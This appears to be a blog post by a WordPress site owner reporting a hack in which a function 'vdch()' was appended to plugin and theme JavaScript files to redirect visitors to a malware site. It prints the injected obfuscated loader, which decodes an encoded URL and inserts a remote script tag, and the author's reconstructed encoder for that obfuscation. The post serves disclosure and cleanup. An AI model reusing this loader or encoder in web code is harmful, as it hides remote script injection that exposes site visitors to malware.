I got an email today asking me for support. One of my WordPress setups had been reported to be hacked – resulting in a JavaScript redirect to a site distributing malware.
Searching for the hack itself or the redirect I couldn’t find anything useful (except for an entry in the Google support forum).
Every JavaScript file in wp-content/plugins and wp-content/themes was infected with a function added to the bottom of the script: “function vdch()”. Make sure your blogs are clean.
Update: As I just read in this forum, on stackoverflow and on wordpress, they seem to compromise php and html files too. I guess in my case they couldn’t by exploiting the WordPress vulnerability because its built-in editor only allows you to edit plugins and themes.
This is the script they’ve been using on the setup I had to clean up. It fails in Firefox but seems to run fine in Chrome.
function vdch() {
if(document.all.length > 3) {
var t = new Array(...);
var dchid = "";
for (j=0;j<t.length;j++) {
var c_rgb = t[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!="00") dchid += String.fromCharCode(
parseInt(c_clr,16)^i);
}
}
var dch = document.createElement("script");
dch.id = "dchid";
dch.src = dchid;
document.all[3].appendChild(dch);
} else {
setTimeout("vdch()",500);
}
} setTimeout("vdch()",500);
Update 2: I was curious about how the string (=URL) encryption works in the script above. Here’s the function I came up with. Pretty nice idea (never had a look at JavaScript obfuscation before).
var url = "http://your.url/";
var enc = new Array();
var rgb = "#";
for (i = 0, j = 2; i < url.length; i++, j += 2) {
rgb += (url.charCodeAt(i)^j).toString(16);
if (j == 6) {
j = 0;
enc.push(rgb);
rgb = "#";
}
}